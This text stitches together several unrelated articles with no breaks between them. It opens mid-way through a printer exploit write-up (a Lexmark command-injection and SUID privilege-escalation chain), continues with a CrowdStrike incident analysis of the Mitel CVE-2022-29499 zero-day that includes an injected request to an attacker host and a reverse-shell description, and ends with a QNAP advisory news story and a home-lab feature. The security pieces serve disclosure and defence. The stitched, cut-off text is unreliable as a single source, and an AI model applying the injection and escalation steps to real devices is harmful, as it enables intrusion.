dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"
The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:
fmt=""
args=""
if [ ${remove} -ne 0 ]; then
fmt="${fmt}b"
args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
fmt="${fmt}s"
args="${args} interface ${interface}"
if [ -n "${filter}" ]; then
fmt="${fmt}s"
args="${args} filter \"${filter}\""
fi
if [ ${auto} -ne 0 ]; then
fmt="${fmt}b"
args="${args} auto 1"
else
fmt="${fmt}s"
args="${args} dest ${dest}"
fi
fi
[...]
At the end of the script, the resulting args value is used in an eval statement:
[...]
resp=""
if [ -n "${fmt}" ]; then
resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
submitted=1
[...]
By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.
Step #3: Privilege Escalation
The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:
# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper
In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:
Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.
The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():
# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.
sd_journal_print() {
systemd-cat -t collect-selogs echo "$@"
}
sd_journal_print "Start! params: '$@'"
[...]
The /dev/shm directory can be used to prepare a malicious version of systemd-cat:
This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-setlogs-wrapper binary like this:
The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:
root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt 2 root root 100 Oct 29 09:33 .
drwxr-xr-x 13 root root 5160 Oct 29 09:31 ..
-rwsr-sr-x 1 root httpd 8256 Oct 29 09:33 python3
-rw------- 1 nobody nogroup 16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x 1 httpd httpd 96 Oct 29 09:33 systemd-cat
The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect_selogs_wrapper SUID again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.
Exploit
An exploit combining the three vulnerabilities to gain unauthenticated code execution as root has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., setup wizard has been completed) or it is password-less (i.e., authentication reset already executed earlier or setup wizard not yet completed). Depending on the result, it decides whether the non-volatile memory reset is required.
If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:
In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.
CrowdStrike Services recently performed an investigation that identified a compromised Mitel VOIP appliance as the threat actor’s entry point.
The threat actor performed a novel remote code execution exploit on the Mitel appliance to gain initial access to the environment.
CrowdStrike identified and reported the vulnerability to Mitel, and CVE-2022-29499 was created.
The threat actor performed anti-forensic techniques on the VOIP appliance in an attempt to hide their activity.
Background
CrowdStrike Services recently investigated a suspected ransomware intrusion attempt. The intrusion was quickly stopped through the customer’s efforts and those of the CrowdStrike Falcon Complete™ managed detection and response (MDR) team, which was supporting this customer’s environment. CrowdStrike determined that all of the identified malicious activity had originated from an internal IP address associated with a device that did not have the CrowdStrike Falcon® sensor installed on it. Further investigation revealed that this source device was a Linux-based Mitel VOIP appliance sitting on the network perimeter; the availability of supported security or endpoint detection and response (EDR) software for these devices is highly limited.
The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment. Thanks to close and immediate work with the Mitel product security incident response team (PSIRT) team, this was identified as a zero-day exploit and patched. The vulnerability was assigned CVE-2022-29499, and the associated security advisory can be found here.
Discovery and Anti-Forensic Techniques
After tracing threat actor activity to an IP address assigned to the Mitel MiVoice Connect VOIP appliance, CrowdStrike received a disk image of the Linux system and began analysis. CrowdStrike’s analysis identified anti-forensic techniques that were performed by the threat actor on the Mitel appliance in an attempt to hide their activity. Given the close proximity in time between the earliest and most recent dates of activity, it was likely that the threat actor attempted to wipe their activity on the Mitel appliance after Falcon Complete detected their activity and prevented them from moving laterally.
Although the threat actor deleted all files from the VOIP device’s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor.
Beyond removing files, the threat actor attempted to overwrite free space on the device. A recovered nohup.out file (generated by running a command via nohup) contained the following:
rm: cannot remove '/cf/swapfile': Operation not permitted
dd: error writing '/tmp/2': No space left on device
10666+0 records in
10665+0 records out
11183382528 bytes (11 GB) copied, 81.3694 s, 137 MB/s
The messages in the recovered file indicated two things. First, the error for the rm1 command failing to delete the swap file demonstrated that rm was used as part of the nohup command. The original rm command run via nohup was likely designed to delete all files, but failed on the swapfile due to it being active, resulting in the error message.
Second, the threat actor used the dd2 command to attempt to create a file (/tmp/2) that, because of its size, would overwrite all of the free space on the device (and indeed did, based on the dd error message “No space left on device”). This anti-forensic measure would have been taken to prevent recovery of data deleted via the initial rm command. However, in this instance, /tmp was on a separate partition than that storing HTTP access logs. While the log files were also deleted via the rm command, the free space that contained their contents was not overwritten, allowing the file contents to be recovered. These recovered HTTP access logs included evidence of the exploit used to compromise the device.
Exploit Details
The exploit involved two GET requests. The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation. This first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses. By first targeting the get_url parameter, the actual exploit request to the vulnerable page came from the local system.
Note that the threat actor IP addresses have been replaced with invalid IPs 1.1.256.1 and 2.2.256.2 below. The URL-encoded portion at the end of the request below decodes to $PWD|sh|?.
The second request included command injection that would cause the system to perform an HTTP GET request to attacker-controlled infrastructure, and then pipe the results of the request locally to sh.3 This would allow execution of whatever commands were stored on the attacker’s server at the requested URL. This vulnerability was caused by the PHP file in question splitting up the parameters for the syncfile command, one of which would subsequently be used by the appliance in a curl command. Because the request came from localhost — by first sending the request to the file with the get_url parameter — it was allowed. The request is shown below.
In addition to recovering the logs, CrowdStrike recovered the contents of two outbound HTTP requests from the appliance to the attacker’s infrastructure. These outbound requests were both caused by the second request shown above. The responses to the outbound requests were also recovered, which demonstrated that the attacker used the exploit to create a reverse shell.
The first outbound request returned valid json related to the application to reach the vulnerable section of code.
Outbound request and response #1:
GET /$PWD|sh|?/ucbsync.php?cmd=manifest HTTP/1.1
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
{"db_files":[{"name":"exmaple0.jpg","size":55318,"date":000000000},{"name":"default_logo.jpg","size":4181,"date":0000000000},{"name":"favicon.ico","size":4364,"date":0000000000},{"name":"example1.jpg","size":73553,"date":0000000000},{"name":"example1.jpg","size":35299,"date":0000000000},{"name":"example2.jpg","size":58617,"date":0000000000},{"name":"default_banner.jpg","size":3148,"date":0000000000},{"name":"example2.jpg","size":63954,"date":0000000000},{"name":"example2.jpg","size":48666,"date":0000000000},{"name":"example3.jpg","size":65224,"date":0000000000},{"name":"example3.jpg","size":39322,"date":0000000000},{"name":"example4.jpg","size":34328,"date":0000000000},{"name":"example5.jpg","size":41095,"date":0000000000},{"name":"example6.jpg","size":43450,"date":0000000000},{"name":"example5.jpg","size":52095,"date":0000000000},{"name":"example7.jpg","size":8331,"date":0000000000}]}
The second outbound request showed the remote execution in action. The following recovered outbound GET request to /shoretel/wc2_deploy (hosted on the threat actor’s external infrastructure) included the payload in its response: an SSL-enabled reverse shell created via the mkfifo command and openssl s_client.
In other words, the threat actor had a webserver (via the Python SimpleHTTP module) running on infrastructure they controlled. On this webserver was a file named wc2_deploy that contained the mkfifo command shown above. Because the threat actor’s exploit request involved reaching out to this URL and piping the response to sh, this would cause the reverse shell command to be executed upon exploitation.
Leveraging first in, first out (FIFO) pipes is a common technique to create a reverse shell. Often, shells created in this manner will use netcat instead of openssl s_client, but the functionality is the same, except that openssl s_client will use ssl and netcat will typically be plaintext.
Post-Exploitation Activity
Once the reverse shell was established, the threat actor created what appeared to be a webshell named pdf_import.php. The contents of pdf_import.php were not recovered; however, it was not a standard file name for the device, and a recovered log file included a POST request to the file that originated from the same IP address that the exploit requests originated from.
The threat actor also downloaded the tunneling/proxy tool Chisel onto the VOIP appliance, renamed it memdump and executed it. This binary acted as a reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device. The execution of Chisel, as well as the POST request to pdf_import.php, both directly corresponded with malicious activity detected and blocked by Falcon Complete on internal devices, suggesting that the threat actor used both tools to attempt to move laterally into the environment.
Conclusion
Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant. That’s why it’s crucial to have multiple layers of defense, such as Falcon Complete MDR, which performs threat monitoring and remediation of malicious activity 24/7. Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via “one hop” from the compromised device. In particular, it’s critical to isolate and limit access to virtualization hosts or management servers such as ESXi and vCenter systems as much as possible. This can involve jump-boxes, network segmentation and/or multifactor authentication (MFA) requirements.
Having an up-to-date and accurate asset inventory is also critically important, as you can’t protect something if you don’t know it exists. In addition, it’s important to ensure all service accounts are managed and accounted for, and that the capability exists to detect abnormal account usage. CrowdStrike Falcon Identity Protection can provide such insight by alerting on stale account usage as well as when accounts are associated with abnormal source or destination systems — and even forcing MFA challenges for users accessing critical assets.
Get up-to-the-minute insights into threat actor activities and new exploits during Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21!
QNAP has warned customers today that some of its Network Attached Storage (NAS) devices (with non-default configurations) are vulnerable to attacks that would exploit a three-year-old critical PHP vulnerability allowing remote code execution.
“A vulnerability has been reported to affect PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24, and 7.3.x below 7.3.11. If exploited, the vulnerability allows attackers to gain remote code execution,” QNAP explained in a security advisory released today.
“To secure your device, we recommend regularly updating your system to the latest version to benefit from vulnerability fixes.”
The Taiwanese hardware vendor has already patched the security flaw (CVE-2019-11043) for some operating system versions exposed to attacks (QTS 5.0.1.2034 build 20220515 or later and QuTS hero h5.0.0.2069 build 20220614 or later).
However, the bug affects a wide range of devices running:
QTS 5.0.x and later
QTS 4.5.x and later
QuTS hero h5.0.x and later
QuTS hero h4.5.x and later
QuTScloud c5.0.x and later
QNAP customers who want to update their NAS devices to the latest firmware automatically need to log on to QTS, QuTS hero, or QuTScloud as administrator and click the “Check for Update” button under Control Panel > System > Firmware Update.
You can also manually upgrade your device after downloading the update on the QNAP website from Support > Download Center.
QNAP devices targeted by ransomware
Today’s warning comes after the NAS maker warned its customers on Thursday to secure their devices against active attacks deploying DeadBolt ransomware payloads.
BleepingComputer also reported over the weekend that ech0raix ransomware has started targeting vulnerable QNAP NAS devices again, according to sample submissions on the ID Ransomware platform and multiple user reports who had their systems encrypted.
Until QNAP issues more details on ongoing attacks, the infection vector used in these new DeadBolt and ech0raix campaigns remains unknown.
While QNAP is working on patching the CVE-2019-11043 PHP vulnerability in all vulnerable firmware versions, you should ensure that your device is not exposed to Internet access as an easy way to block incoming attacks.
As QNAP has advised in the past, users with Internet-exposed NAS devices should take the following measures to prevent remote access:
Disable the Port Forwarding function of the router: Go to the management interface of your router, check the Virtual Server, NAT, or Port Forwarding settings, and disable the port forwarding setting of the NAS management service port (port 8080 and 433 by default).
Disable the UPnP function of the QNAP NAS: Go to myQNAPcloud on the QTS menu, click the “Auto Router Configuration,” and unselect “Enable UPnP Port forwarding.”
QNAP also provides detailed info on how to toggle off remote SSH and Telnet connections, change the system port number, change device passwords, and enable IP and account access protection to further secure your device.
Update June 22, 08:45 EDT: After this story was published, QNAP’s PSIRT team updated the original advisory and told BleepingComputer that devices with default configurations are not impacted by CVE-2019-11043.
Also, QNAP said that the Deadbolt ransomware attacks are targeting devices running older system software (released between 2017 and 2019).
For CVE-2019-11043, described in QSA-22-20, to affect our users, there are some prerequisites that need to be met, which are:
nginx is running, and
php-fpm is running.
As we do not have nginx in our software by default, QNAP NAS are not affected by this vulnerability in their default state. If nginx is installed by the user and running, then the update provided with QSA-22-20 should be applied as soon as possible to mitigate associated risks.
We are updating our security advisory QSA-22-20 to reflect the facts stated above. Again we would like to point out that most QNAP NAS users are not affected by this vulnerability since its prerequisites are not met. The risk only exists when there is user-installed nginx present in the system.
We have also updated the story to reflect the new information provided by QNAP.
For many years, a home IT lab was a “requirement” for any budding IT Pro – you needed a place to test out new software and learn. In some ways, this requirement has lessened with the rise of cloud computing but many of our great DOJO contributors continue to use a home labs setup. In this article, we’ll hear from them, what their setup is, why, choices they made along the way and what they plan for the future.
Andy Syrewicze
Altaro/Hornetsecurity Technical Evangelist – Microsoft MVP
Why do you have a lab?
The main reason I’ve always maintained a lab is to keep my skills current. Not only does my lab allow me to fill knowledge gaps in existing technologies I work with, but it allows me to test new features, or work with other technologies I’ve never worked with before. In doing this I can make sure I’m effective with and knowledgeable about current and emerging technologies. Plus… it’s just fun as well =)
How did I source my home lab?
I research other commonly used home lab equipment on the web and paired that with my working knowledge of the hardware industry and settled on commodity SuperMicro gear that was cost-effective yet had some of the features I was looking for. Other bits and pieces I picked up over the years as needed. For example, I’ve recently been doing some work with Azure site-to-site VPNs and as such purchased a Ubiquiti firewall capable of pairing with an Azure VPN gateway.
1 x Intel i350 1Gbps Quad Port Ethernet Adapter for management and compute traffic
1 x Dual port 10Gbps Mellanox Connect-X 3 for east/west storage traffic
Additionally, my physical lab has:
1 Cyberpower UPS with about 1-hour runtime in case of power outages
1 ReadyNAS 316 for backup storage with 4 x 1TB HDDs
1 Ubiquiti UDM Pro for firewalling and layer-3 routing
2 Ubiquiti WAPs for Wireless access in the house
2 NetGear ProSAFE switches wired in a redundant capacity
On top of that, I do pair some Azure cloud resources with my lab and send private traffic over my site-to-site VPN between my UDM-Pro and my Azure vNet. Services running in the cloud include:
1 x IaaS VM with AD Domain Services running on it
1 x storage account for Azure Files storage
1 x storage account for blob offsite backup storage
1 x container in Azure container instance running a Minecraft Server for my son and his friends (HIGHLY critical workload I know…)
Some basic Azure ARC services (Been slowly working on this over the last few months)
What services do you run and how do they interact with each other?
I mostly run virtualized workloads on the on-prem cluster. This is typically VMs, but I’ve started tinkering a bit with containers and Azure Kubernetes Service. The cluster also runs VMs for AD/DNS, DHCP, Backup/DR, File-Service and a few other critical gaming workloads for the end-users in the house! The cloud resources also have backup AD/DNS components, file storage, and offsite storage for the on-prem backups. I also use Azure for the occasional large VM that I don’t have the resources on-prem to run.
What do you like and don’t like about your setup?
I’ll start with the positive. I really like that my lab is hyper-converged as well as hybrid-cloud in that there are used resources in Azure access via VPN.
There are two things I’d like to change about my setup they’d:
>More memory for the compute nodes. When running VMware VSAN, VSAN itself and vCenter (required for VSAN) consume about 48GB of memory. This doesn’t leave much memory left over for VMs. Thankfully S2D and Azure Stack HCI don’t have this issue. Either way, memory is my next upgrade coming soon
Upgraded Mellanox Cards. Don’t get me wrong, the Connect-X 3s were amazing for their time, but they are starting to get quite outdated. More recent Connect-X cards would be preferred and better supported, but there certainly is a cost associated with them.
What does your roadmap look like?
As mentioned above I’m likely to add more memory soon, and potentially upgrade my storage NICs. Additionally, I’d like to add a 3rd node at some point but that is quite a ways down the line.
Any horror stories to share?
Not really, I had one situation where I was away from the house on a work trip and the cluster rebooted due to an extended power outage. The OpenSM service which runs the subnet for the storage network between the direct-connected Mellanox cards didn’t start, thus the storage network never came online. This meant that the core services never came online for the house. Thankfully, the VPN to azure remained online and things in the house were able to use my Azure IaaS hosted Domain Controller for DNS resolution until I got home.
Eric Siron
Senior System Administrator – Microsoft MVP
You may know Eric as a long-time DOJO contributor whose first articles for this site were written on stone tablets. He knows more about the inner workings of Hyper-V than anyone else I know.
All the technical articles that I write depend on first-hand tests and screenshots. My home lab provides the platform that I need while risking no production systems or proprietary data. Like the small business audience that I target, I have a small budget and long refresh cycles. It contained no cutting-edge technology when I originally obtained it, and it has fallen further behind in its four years of use. However, it still serves its purpose admirably.
Component Selection Decisions
Tight budgets lead to hard choices. Besides the cost restraint, I had to consider that my design needed to serve as a reproducible model. That ruled out perfectly viable savings approaches such as secondhand, refurbished, or clearance equipment. So, I used only new, commonly available, and inexpensive parts.
Architectural Design Decisions
Even on a budget, I believe that organizations need a strong computing infrastructure. To meet that goal, I designed a failover cluster with shared storage. As most of the items that I used now have superior alternatives at a similar or lower price, I will list only generic descriptions:
>2x entry-level tower server-class computers with out-of-band module
All the technical articles that I have written in the last few years involved this lab build in some fashion.
Lab Configuration and Usage
Since the first day, I have used essentially the same configuration.
The two towers with an out-of-band module run Windows Server with Hyper-V and belong to a cluster. Each one hosts one of the lab’s domain controllers on mirrored internal storage.
The single tower with the large drive set acts as shared storage for the cluster. The drives are configured in a RAID-5. Also, because this is a lab, it contains virtual machine backups.
I generally do not integrate cloud services with my lab, primarily because a lot of small businesses do not yet have a purpose for integration between on-premises servers and public clouds. I do use basic services that enhance the administrative quality of life without straining the budget, such as Azure Active Directory.
Lab Maintenance, Management, and Monitoring
Whenever possible and practical, I use PowerShell to manage my lab. When graphical tools provide better solutions, I use a mix of Windows Admin Center and the traditional MMC tools (Hyper-V Manager, Failover Cluster Manager, Active Directory Users and Computers, etc.). For monitoring, I use Nagios with alerts through a personal e-mail account. I back up my virtual machines with Altaro VM Backup.
Aside from Altaro, none of the tools that I use in the lab requires additional license purchases. For instance, I do not use any System Center products. I believe that this practice best matches my audience’s uses and constraints. Most paid tools are too expensive, too complex, too resource-hungry, and require too much maintenance of their own to justify use in small businesses.
I only reformat drives for operating system upgrades. The in-place upgrade has become more viable through the years, but I still see no reward for the risk. On general principle, I do not reload operating systems as a fix for anything less than drive failures or ransomware. Once I feel that Windows Server 2022 has had enough testing by others, these hosts will undergo their third ever reformat.
Pros and Cons of this Lab
Overall, this lab satisfies me. A few of the reasons that I like it:
Low cost
Stability
Acceptable performance for typical small business daily functions
Good balance of performance and capacity
Ability to test the most common operations for a Microsoft-centric shop
Things that I would improve:
The storage performs well enough for a regular small business, but I’m an impatient administrator
Memory
Network adapter capabilities
Theresa Miller
Principal Technologist at Cohesity and Microsoft MVP
Why do you have a lab?
I have had various forms of home labs over the years for varying reasons. In fact, when I built my home, I made sure my house was hard-wired for internet, which shows how long I have been in the technology industry. At the time hard wiring was the only way to distribute the internet to all the rooms in your home; unlike today where we have wireless and Wi-Fi extender options to help with network stability, Wi-Fi extending to places like the outdoors, and additional security features. Back to the question at hand, What do you use it for? my home lab options are what enable to me put forth the IT Community work that I have done. This includes having the tech to create training courses, blogging, events speaking and more. So, “When and why did you decide to get a home lab? I decided to get a home lab over 8 years ago and continue to use every evolution of my home lab for this function, educating myself and others.
How did I source my home lab?
Initially, my home lab was sourced by end-of-life equipment that my employer allowed employees to wipe the storage on, but eventually, I transitioned to source my hardware through a side business I have had for over 8 years. Purchasing a single Dell PowerEdge server, I was able to virtualize all of the servers I needed to run Active Directory and any necessary windows servers needed at the time. Beyond that my IT Community involvement has allowed me to enjoy the appropriate software licensing needed to support such an environment.
Over time my home lab has changed, my hardware became end-of-life and what was once set up in my basement lab is now hosted in the Azure Cloud. Yep, I decommissioned my hardware and switched to cloud.
What were your considerations and decision points for what you decided to purchase?
The transition to the cloud came from the fact that has become a challenge to deal with end-of-life hardware, and ever-evolving hardware requirements becoming outdated for the latest software running. Not only did it become time-consuming to manage, but it also became too costly.
What’s your setup?
My setup today is now in the Azure cloud, so the only hardware I have in my home is my internet router and the appropriate Eero wifi extenders that are needed to ensure network reliability. I find that running all cloud keeps my backend infrastructure up to date accordingly. For storage, I leverage all Azure-managed disks are block-level storage volumes that are managed by Azure on my servers that I need to leverage with keeping the consumption of resources low in mind.
What services do you run and how do they interact with each other and what services do you run and how do they interact with each other?
My minimal environment consists of a windows VM with Active Directory deployed the Azure DNS service, and one additional basic VM that changes depending on the technology I am testing. The basic VM can sometimes grow to multiple VMs if the project software being deployed requires it. In that scenario, I may also have SQL server deployed if that’s required. I try to keep the deployment simple but keep the core foundational elements in place as needed, and wipe systems as needed. How do I manage all of this? I leverage cost management services that notify me if I hit the threshold that I am willing to pay. At that point I may need to make some decisions around which systems must stay online and what I can shut down, or if I want to pay more that month.
What do you like and don’t like about your setup?
I am really happy with my setup since I have moved to a cloud model because maintaining the hardware including the cost of electricity became time-consuming. While costs with the cloud virtual machines that I have to keep me from having a large-scale deployment, I am ok with that. It’s fun to tear down and bring online what I need when I am looking to try something new with technology.
What does your roadmap look like?
My roadmap is strictly focused on what technology to try out next, and I find that I make these decisions based on technology that I cross paths with that is interesting in that moment. It could be something new, or something that has been around for some time that I may need to dive deeper into for a project or just for new learning and sharing.
Any horror stories to share?
I don’t have any horror stories to share when it comes to my home lab. I have adapted as needed from on-premises hardware in my home to a cloud model that has allowed me to be agile and keep my learning and technology sharing ongoing.
Paul Schnackenburg
Finally, here are some words from me. IT Consultant & DOJO editor.
If you’re starting out in IT today, you probably don’t realize the importance of having a home IT lab setup. But when the cloud was just a faint promise if you wanted to practice on your own, to further your skills or try something out, you had to have your own hardware to do it on. Early on I used VMware workstation to spin up VMs, but there are limitations on what you can fit, especially when you need multiple VMs running simultaneously, and 15 years ago, RAM was a lot more expensive (and came with a lot less GB) than it is today.
After some years I realized that I needed separate machines to practice setting up Hyper-V clusters, Live Migration etc. so I bought the first parts of my set-up back in 2012, starting with three “servers”. I couldn’t justify the cost of real servers, so I got desktop-class motherboards, Intel i5 CPUs and 32 GB of RAM for three servers. One became a storage server, running Windows Server 2012 as an iSCSI target (again I didn’t have the budget for a real iSCSI SAN), and the other two VM hosting nodes in the cluster. Connectivity came from Intel 4 port 1 Gb/s NICs, offering decent bandwidth between nodes. A few years later I added two more nodes and a separate domain controller PC. The backend storage for Hyper-V VM disks was changed over to an SMB 3 file server as Hyper-V was now supporting this. All throughout this time, I was writing articles on Hyper-V and System Center for various outlets and this setup served as my test bed for several different applications and systems. From an “investment” point of view, it made perfect sense to have these systems in place.
I also worked as a part-time teacher and because we were only given “hand me down” hardware for the first few years of Hyper-V and VMware becoming mainstream and part of the curriculum I opted to house the servers on a desk in our hardware lab. That way my students could experiment with Live Migration etc. and through my own VPN connection to the boxes, I could access the cluster after hours to test new software apps and write articles.
In early 2016 this cluster was three nodes and one storage server, but two things happened – Windows Server 2016 offered a new option – Storage Spaces Direct (S2D) and I outfitted all four servers with two 1 TB HDDs and two 120 GB SSDs (small by today’s standard, but this is now eight years ago). These were all consumer grade (again – budget) and wouldn’t have been supported for production, especially not connected to desktop-class hardware but they did allow me (and my students) to explore S2D and VM High Availability.
The other thing that happened was that Chelsio – makers of high-end Remote Direct Memory Access (RDMA) / iWarp 10/25/40 Gb/s Ethernet hardware offered me some NICs in exchange for writing a few reviews. So, two nodes in the cluster were outfitted with a two-port 40 Gb/s card, and the other two with a two-port 10 Gb/s card. Initially, I did testing with the cabling running directly between two nodes, but this didn’t allow for a full, four-node cluster so I purchased a Dell X4012, 12 port 10 Gb/s switch. The two 10 Gb/s NICs used two cables each for a total bandwidth of 20 Gb/s, while the 40 Gb/s NICs came with “spider” cables with a 40 Gb/s interface in the server end, and four 10 Gb/s cables connected to the switches for a total bandwidth of 40 Gb/s. This was ample for the S2D configuration and gave blazing-fast Live Migrations, storage traffic and other East-West flows.
Dell X4012 10Gb/s switch
In late 2020 I left the teaching job so the whole cluster was mothballed in my home office for 1 ½ years and over the last month I’ve been resurrecting it (after purchasing an Ikea bookshelf to hold it all). Currently, it’s running Windows Server 2022 Datacenter. Each upgrade has been a complete wipe and reinstall of Windows Server (desktop experience, Server Core is just too hard to troubleshoot).
Trying to revive this old hardware has taught me two things – first, the “fun” of misbehaving (or just plain old) hardware to wrestle with was a lot more attractive when I was younger, and the cloud is SO much better for this stuff. Hence my home lab was mothballed for so long and I didn’t really miss it.
I use Windows Admin Center to manage it all, and I’ll also use various Azure cloud services for backup etc. to test them out.
My only “horror story” (apart from all the silly, day-to-day mistakes we all make) is during the wipe and reinstall to Windows Server 2019, using the wrong product key and ending up with four Windows Server Standard nodes – which don’t support Storage Spaces Direct.
What’s your Homelab Setup (and do you even need one)?
As you can see, home labs come in many shapes and sizes. If you’re a budding IT Pro today and you’re wondering if a home lab is right for you, consider the use cases it would fulfil for you very carefully. I see some trainers and IT Pros opting for laptops with large amounts of storage and memory and virtualizing everything on a single PC – certainly that cover many use cases. But if your employers are still mostly on-premises and supporting server clusters is still part of your daily life, nothing beats having two or three physical cluster nodes to test and troubleshoot. Expect to pay a few thousand US dollars (or the equivalent in your currency) and balance the extra cost of “real” servers with the cost savings but time investment in building your own PCs.
If you’re considering setting up a machine or two for your home lab I have the following recommendations – select cases that allow for upgrades and changes in the future, you never know what you’ll need to install and test. Don’t spend money on expensive, server-grade hardware unless you have to – your home lab is unlikely to be mission-critical. Go for fewer nodes, it’s easy to fit a cost-effective machine today with 64, 128 or even more RAM, giving you plenty of space for running VMs. And use SSDs (or NVMe) for all storage if you can afford it, using HDDs is just too slow.
And don’t forget the power of hosting your lab in the cloud, making it easy to rebuild and scale up and down, with a lower initial cost but a monthly subscription cost instead to keep an eye on.
